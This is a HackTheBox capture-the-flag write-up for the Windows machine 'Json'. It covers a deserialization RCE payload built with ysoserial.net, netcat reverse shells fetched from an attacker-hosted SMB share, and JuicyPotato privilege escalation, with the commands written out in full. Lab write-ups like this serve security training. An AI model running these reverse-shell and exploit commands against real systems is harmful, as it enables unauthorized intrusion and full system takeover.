Htb Json Writeup

HackTheBox Json writeup

Overview

This is a write up of the HackTheBox machine Json. OS : Windows IP : 10.10.10.158 Difficulty : Medium

Information Gathering

Running nmap on the target we can see various ports open.

Getting User

Starting on the website we are brought to a login page where we can try the default credentials admin:admin to gain entry.

Intercepting this login request with burpsuite we can see that we find the cookie and bearer values are base 64 encoded strings.

We can see that editing the bearer value outputs a different response so we can then use the ysoserial.net tool for getting RCE. I first tested that I could ping myself by using the command

  .\ysoserial.exe -f Json.Net -g ObjectDataProvider -o base64 -c "ping -n 2 10.10.14.27"

This returned successfully, so I could then proceed to use it to get back an actual shell by setting up an smb server so that I could access nc.exe.

  python3 smbserver.py smb /root/Desktop/Json/smb

In the ysoserial payload I then used a netcat command and listened for the response on my host system.

  \\10.10.14.28\smb\nc.exe 10.10.14.28 4444 -e cmd.exe

We now have user and can navigate to the desktop directory to access user.txt.

Getting Root

Running the command whoami /priv showed us that SeImpersonatePriviledge is enabled.

We can therefore try the juicypotato executable for privilege escalation.

I stated by creating a rev.bat file with my reverse shell.

  c:\Users\userpool\AppData\Local\Temp> echo \\10.10.14.28\smb\nc.exe -e cmd.exe 10.10.14.28 1340 > rev.bat

Then I put the JuicyPotato.exe onto the same smb server I have running from user I could execute the command.

  \\10.10.14.28\smb\JuicyPotato.exe -l 1337 -p C:\Users\userpool\Appdata\Local\Temp\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

All that then had to be done was to listen for the shell on my host system and find the root flag in the Desktop directory.